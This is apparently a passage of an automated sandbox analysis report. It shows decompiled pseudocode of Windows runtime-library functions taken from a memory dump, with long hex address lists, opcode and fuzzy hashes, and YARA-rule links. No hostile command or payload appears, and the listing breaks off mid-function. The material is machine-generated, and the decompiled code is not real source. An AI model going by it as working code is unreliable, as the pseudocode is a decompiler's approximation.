                                                                          0x011ebf0f
                                                                          0x00000000
                                                                          0x011afc36
                                                                          0x011afc38
                                                                          0x011afc3b
                                                                          0x011afc41
                                                                          0x011ebf17
                                                                          0x011ebf19
                                                                          0x011ebf48
                                                                          0x011ebf4b
                                                                          0x00000000
                                                                          0x011ebf1b
                                                                          0x011ebf22
                                                                          0x011ebf24
                                                                          0x011ebf26
                                                                          0x00000000
                                                                          0x011ebf2c
                                                                          0x011ebf37
                                                                          0x011ebf39
                                                                          0x011ebf3b
                                                                          0x00000000
                                                                          0x011ebf41
                                                                          0x011ebf41
                                                                          0x011ebf41
                                                                          0x011ebf41
                                                                          0x011ebf45
                                                                          0x00000000
                                                                          0x011ebf45
                                                                          0x011ebf3b
                                                                          0x011ebf26
                                                                          0x00000000
                                                                          0x011afc47
                                                                          0x011afc47
                                                                          0x011afc49
                                                                          0x011afcb2
                                                                          0x011afcb4
                                                                          0x011afcb6
                                                                          0x011afcdc
                                                                          0x011afcdc
                                                                          0x00000000
                                                                          0x011afcb8
                                                                          0x011afcc3
                                                                          0x011afcc5
                                                                          0x011afcc7
                                                                          0x00000000
                                                                          0x011afcc9
                                                                          0x011afcc9
                                                                          0x011afccd
                                                                          0x00000000
                                                                          0x011afccd
                                                                          0x011afcc7
                                                                          0x00000000
                                                                          0x011afc4b
                                                                          0x011afc4b
                                                                          0x011afc4e
                                                                          0x011afc4e
                                                                          0x011afc51
                                                                          0x011afc51
                                                                          0x011afc54
                                                                          0x011afc5a
                                                                          0x011afc5c
                                                                          0x011afc5f
                                                                          0x011afc61
                                                                          0x011afc63
                                                                          0x011afc65
                                                                          0x011afc67
                                                                          0x011afc6e
                                                                          0x011afc72
                                                                          0x011afc72
                                                                          0x011afc72
                                                                          0x011afc72
                                                                          0x011afc67
                                                                          0x011afc61
                                                                          0x00000000
                                                                          0x011afc5a
                                                                          0x011afc49
                                                                          0x011afc41
                                                                          0x011afc30
                                                                          0x011afc27
                                                                          0x011afc03
                                                                          0x011afbcd
                                                                          0x011afbd3
                                                                          0x011afbd9
                                                                          0x011afbdc
                                                                          0x011afbde
                                                                          0x011afc99
                                                                          0x011afc9b
                                                                          0x011afc9d
                                                                          0x011afcd5
                                                                          0x011afcd5
                                                                          0x011afc89
                                                                          0x011afc89
                                                                          0x00000000
                                                                          0x011afc9f
                                                                          0x011afc9f
                                                                          0x011afca3
                                                                          0x00000000
                                                                          0x011afca3
                                                                          0x00000000
                                                                          0x011afbe4
                                                                          0x011afbe4
                                                                          0x011afbe4
                                                                          0x011afbe4
                                                                          0x011afbe9
                                                                          0x011afbf2
                                                                          0x00000000
                                                                          0x011afbf2
                                                                          0x011afbde
                                                                          0x011afbcb
                                                                          0x011afbab
                                                                          0x011afc8b
                                                                          0x011afc8b
                                                                          0x011afc8c
                                                                          0x011afb80
                                                                          0x011afb72
                                                                          0x011afb5e
                                                                          0x011afc8d
                                                                          0x011afc91
                                                                          0x011afadf
                                                                          0x011afadf
                                                                          0x011afae1
                                                                          0x011afae4
                                                                          0x011afae7
                                                                          0x011afaec
                                                                          0x011afaf8
                                                                          0x011afb00
                                                                          0x011afb07
                                                                          0x011afb0f
                                                                          0x011afb0f
                                                                          0x011afb07
                                                                          0x00000000
                                                                          0x011afaf8
                                                                          0x011afadd

                                                                          Strings
                                                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 011EBE0F
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                          • API String ID: 0-865735534
                                                                          • Opcode ID: 1638fb90142f267e75c66bff3959b61840a8410812091d8bb2253a8d15be0a89
                                                                          • Instruction ID: fe77a96425ec91215a9535f95852d4ec97ddc127646259753e74ad631ebe377e
                                                                          • Opcode Fuzzy Hash: 1638fb90142f267e75c66bff3959b61840a8410812091d8bb2253a8d15be0a89
                                                                          • Instruction Fuzzy Hash: 7BA13635B00A078BEB2EDFA9C454BBEBBF5AF44724F144569D902CB681DB34D842CB81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01172D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 63%
                                                                          			E01172D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1265350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1267bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E011B97C0();
				}
				if( *0x12679c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x12679c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E011A1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01197D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0120FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E011B9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E011AE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L011CDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1266901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1266901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E011B9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E011B95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01197D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01197D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E011F7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0120FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1265350;
							if(_t109 != 0x1265350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0120FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01205720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                          0x01172d8a
                                                                          0x01172d8a
                                                                          0x01172d92
                                                                          0x01172d96
                                                                          0x01172d9e
                                                                          0x01172da0
                                                                          0x01172da3
                                                                          0x01172da5
                                                                          0x01172da8
                                                                          0x01172dab
                                                                          0x01172db2
                                                                          0x011cf9aa
                                                                          0x011cf9ab
                                                                          0x011cf9ae
                                                                          0x011cf9ae
                                                                          0x01172db8
                                                                          0x01172dc2
                                                                          0x011cf9b9
                                                                          0x011cf9be
                                                                          0x011cf9bf
                                                                          0x011cf9bf
                                                                          0x01172dcf
                                                                          0x011cf9c9
                                                                          0x01172dd5
                                                                          0x01172dd5
                                                                          0x01172dd5
                                                                          0x01172dde
                                                                          0x01172de1
                                                                          0x01172e70
                                                                          0x01172e72
                                                                          0x01172e72
                                                                          0x01172de7
                                                                          0x01172deb
                                                                          0x01172e7c
                                                                          0x01172e83
                                                                          0x01172e85
                                                                          0x01172e8b
                                                                          0x01172e8d
                                                                          0x01172e92
                                                                          0x01172e92
                                                                          0x01172e85
                                                                          0x01172df1
                                                                          0x01172df7
                                                                          0x01172df9
                                                                          0x01172df9
                                                                          0x01172dfc
                                                                          0x01172dff
                                                                          0x01172e02
                                                                          0x00000000
                                                                          0x01172e05
                                                                          0x01172e0c
                                                                          0x011cf9d9
                                                                          0x01172e12
                                                                          0x01172e12
                                                                          0x01172e12
                                                                          0x01172e1a
                                                                          0x011cf9e3
                                                                          0x011cf9e9
                                                                          0x011cf9f0
                                                                          0x011cf9f6
                                                                          0x011cf9f8
                                                                          0x011cf9f8
                                                                          0x011cf9f0
                                                                          0x01172e23
                                                                          0x011cfa02
                                                                          0x011cfa03
                                                                          0x011cfa05
                                                                          0x011cfa06
                                                                          0x00000000
                                                                          0x01172e29
                                                                          0x01172e29
                                                                          0x01172e2e
                                                                          0x01172e34
                                                                          0x01172e3e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01172e44
                                                                          0x01172e47
                                                                          0x01172e4d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01172e4f
                                                                          0x01172e54
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01172e5a
                                                                          0x01172e5f
                                                                          0x01172e9a
                                                                          0x01172ea4
                                                                          0x01172ea5
                                                                          0x01172ea8
                                                                          0x01172eaf
                                                                          0x01172eb2
                                                                          0x01172eb5
                                                                          0x011cfae9
                                                                          0x011cfaeb
                                                                          0x011cfaed
                                                                          0x011cfaef
                                                                          0x011cfaf7
                                                                          0x011cfaf8
                                                                          0x011cfafd
                                                                          0x011cfaff
                                                                          0x011cfb04
                                                                          0x011cfb04
                                                                          0x011cfaff
                                                                          0x01172ec0
                                                                          0x01172ec4
                                                                          0x01172ec6
                                                                          0x01172ec8
                                                                          0x011cfb14
                                                                          0x011cfb18
                                                                          0x011cfb1e
                                                                          0x011cfb21
                                                                          0x011cfb21
                                                                          0x01172ece
                                                                          0x01172ece
                                                                          0x01172ece
                                                                          0x01172ed7
                                                                          0x01172e61
                                                                          0x01172e63
                                                                          0x011cfa6b
                                                                          0x011cfa71
                                                                          0x011cfa76
                                                                          0x011cfa78
                                                                          0x011cfa8a
                                                                          0x011cfa7a
                                                                          0x011cfa83
                                                                          0x011cfa83
                                                                          0x011cfa8f
                                                                          0x011cfa91
                                                                          0x011cfa97
                                                                          0x011cfa9d
                                                                          0x011cfaa4
                                                                          0x011cfaaa
                                                                          0x011cfaaf
                                                                          0x011cfab1
                                                                          0x011cfac3
                                                                          0x011cfab3
                                                                          0x011cfabc
                                                                          0x011cfabc
                                                                          0x011cfac8
                                                                          0x011cfacb
                                                                          0x011cfadf
                                                                          0x011cfadf
                                                                          0x011cfacb
                                                                          0x011cfaa4
                                                                          0x011cfa91
                                                                          0x01172e6f
                                                                          0x01172e6f
                                                                          0x01172e5f
                                                                          0x011cfa13
                                                                          0x011cfa15
                                                                          0x011cfa17
                                                                          0x011cfa1f
                                                                          0x011cfa21
                                                                          0x011cfa22
                                                                          0x011cfa25
                                                                          0x011cfa28
                                                                          0x011cfa2f
                                                                          0x011cfa2f
                                                                          0x011cfa2a
                                                                          0x011cfa2a
                                                                          0x011cfa2a
                                                                          0x011cfa31
                                                                          0x011cfa34
                                                                          0x011cfa36
                                                                          0x011cfa3c
                                                                          0x011cfa3e
                                                                          0x011cfa41
                                                                          0x011cfa43
                                                                          0x011cfa45
                                                                          0x011cfa45
                                                                          0x011cfa41
                                                                          0x011cfa3c
                                                                          0x011cfa4a
                                                                          0x011cfa4f
                                                                          0x011cfa51
                                                                          0x011cfa53
                                                                          0x011cfa56
                                                                          0x011cfa5b
                                                                          0x011cfa5e
                                                                          0x00000000
                                                                          0x011cfa5e
                                                                          0x01172e23

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Re-Waiting
                                                                          • API String ID: 0-316354757
                                                                          • Opcode ID: d50b73ad1c6e4f5bd0d0752c03e56f3d09377329e0cee7c2f134e1dc54fe5bd5
                                                                          • Instruction ID: 360e0f764bcae9453e91b7c7165dc817a165cb2ca53c93547a9c9874d73e9fec
                                                                          • Opcode Fuzzy Hash: d50b73ad1c6e4f5bd0d0752c03e56f3d09377329e0cee7c2f134e1dc54fe5bd5
                                                                          • Instruction Fuzzy Hash: 16613531A006069FDB3EDF6CC840B7EBBF6EB55B14F150669E511973C1CB3499428782
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01240EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 80%
                                                                          			E01240EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0123FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01241074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E011B9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0123A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0123A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1268b04 >> 0x14) + (_v44 -  *0x1268b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01197D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0123138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01197D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0122FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1268724 & 0x00000008) != 0) {
						E012352F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E012415B5(0x1268ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                          0x01240eb7
                                                                          0x01240eb9
                                                                          0x01240ec0
                                                                          0x01240ec2
                                                                          0x01240ecd
                                                                          0x0124105b
                                                                          0x0124105b
                                                                          0x01241061
                                                                          0x01241066
                                                                          0x01241066
                                                                          0x0124106b
                                                                          0x01241073
                                                                          0x01241073
                                                                          0x01240ed3
                                                                          0x01240ed6
                                                                          0x01240edc
                                                                          0x01240ee0
                                                                          0x01240ee7
                                                                          0x01240ef0
                                                                          0x01240ef5
                                                                          0x01240efa
                                                                          0x01240efc
                                                                          0x01240efd
                                                                          0x01240f03
                                                                          0x01240f04
                                                                          0x01240f06
                                                                          0x01240f07
                                                                          0x01240f09
                                                                          0x01240f0e
                                                                          0x01240f14
                                                                          0x01240f23
                                                                          0x01240f2d
                                                                          0x01240f34
                                                                          0x01240f34
                                                                          0x01240f14
                                                                          0x01240f52
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01240f58
                                                                          0x01240f73
                                                                          0x01240f74
                                                                          0x01240f79
                                                                          0x01240f7d
                                                                          0x01240f80
                                                                          0x01240f86
                                                                          0x01240fab
                                                                          0x01240fb5
                                                                          0x01240fc6
                                                                          0x01240fd1
                                                                          0x01240fe3
                                                                          0x01240fd3
                                                                          0x01240fdc
                                                                          0x01240fdc
                                                                          0x01240feb
                                                                          0x01241009
                                                                          0x01241009
                                                                          0x01241015
                                                                          0x01241027
                                                                          0x01241017
                                                                          0x01241020
                                                                          0x01241020
                                                                          0x0124102f
                                                                          0x0124103c
                                                                          0x0124103c
                                                                          0x01241048
                                                                          0x01241050
                                                                          0x01241050
                                                                          0x01241055
                                                                          0x00000000
                                                                          0x01241055
                                                                          0x01240f88
                                                                          0x01240f9e
                                                                          0x01240fa2
                                                                          0x01240fa9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01240fa9
                                                                          0x00000000

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: `
                                                                          • API String ID: 0-2679148245
                                                                          • Opcode ID: 1d191db84705fb1197a7aaaecd14b97651e4376a533ea64cedc6fae725fd8d19
                                                                          • Instruction ID: 92664813b33de5e6cba5c77bbc1689151ed10757a1a78bbe35b2e79fdbb407cd
                                                                          • Opcode Fuzzy Hash: 1d191db84705fb1197a7aaaecd14b97651e4376a533ea64cedc6fae725fd8d19
                                                                          • Instruction Fuzzy Hash: AE518E713243429FD329DF28D984B6BBBE5EBC4704F04092CFA9697290D771E845CB66
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011AF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 75%
                                                                          			E011AF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01194120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E011B9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E011B9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E011B95D0();
							goto L11;
						} else {
							_t109 = L01194620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E011BF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E011B95D0();
										L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                          0x011af0d3
                                                                          0x011af0d9
                                                                          0x011af0e0
                                                                          0x011af0e7
                                                                          0x011af0f2
                                                                          0x011af0f4
                                                                          0x011af0f8
                                                                          0x011af100
                                                                          0x011af108
                                                                          0x011af10d
                                                                          0x011af115
                                                                          0x011af116
                                                                          0x011af11f
                                                                          0x011af123
                                                                          0x011af124
                                                                          0x011af12c
                                                                          0x011af130
                                                                          0x011af134
                                                                          0x011af13d
                                                                          0x011af144
                                                                          0x011af14b
                                                                          0x011af152
                                                                          0x011ebab0
                                                                          0x011ebab0
                                                                          0x011af158
                                                                          0x011af158
                                                                          0x011af15a
                                                                          0x011af160
                                                                          0x011af165
                                                                          0x011af166
                                                                          0x011af16f
                                                                          0x011af173
                                                                          0x011ebaa7
                                                                          0x011ebaa7
                                                                          0x011ebaab
                                                                          0x00000000
                                                                          0x011af179
                                                                          0x011af18d
                                                                          0x011af191
                                                                          0x011ebaa2
                                                                          0x00000000
                                                                          0x011af197
                                                                          0x011af19b
                                                                          0x011af1a2
                                                                          0x011af1a9
                                                                          0x011af1af
                                                                          0x011af1b2
                                                                          0x011af1b6
                                                                          0x011af1b9
                                                                          0x011af1c4
                                                                          0x011af1d8
                                                                          0x011af1df
                                                                          0x011af1e3
                                                                          0x011af1eb
                                                                          0x011af1ee
                                                                          0x011af1f4
                                                                          0x011af20f
                                                                          0x011ebab7
                                                                          0x011ebabb
                                                                          0x011ebacc
                                                                          0x011ebad1
                                                                          0x011af215
                                                                          0x011af218
                                                                          0x011af226
                                                                          0x011af22b
                                                                          0x00000000
                                                                          0x011af22b
                                                                          0x011af1f6
                                                                          0x011af1f6
                                                                          0x011af1f9
                                                                          0x011af1fb
                                                                          0x011af1fb
                                                                          0x011af1f4
                                                                          0x011af191
                                                                          0x011af173
                                                                          0x011af152
                                                                          0x011af203

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @
                                                                          • API String ID: 0-2766056989
                                                                          • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                          • Instruction ID: 2ec492d004d5d97815e015bb553da908f172933409d31059dea16aa08c270a57
                                                                          • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                          • Instruction Fuzzy Hash: 72519E715047159FC324DF59C840A6BBBF8FF98714F00892EFA95876A0E7B4E905CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011F3540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 75%
                                                                          			E011F3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x126d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E011B0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E011F3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E011BFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E011F3540;
						E011BFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E011CDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01200C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E011B97C0();
					}
					return E011BB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E011F3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E011F3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E011BFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E011B9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E011F3787(_a4,  &_v352, _t80);
						}
					}
					L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E011B95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                          0x011f3552
                                                                          0x011f355a
                                                                          0x011f355d
                                                                          0x011f3566
                                                                          0x011f3567
                                                                          0x011f357e
                                                                          0x011f358f
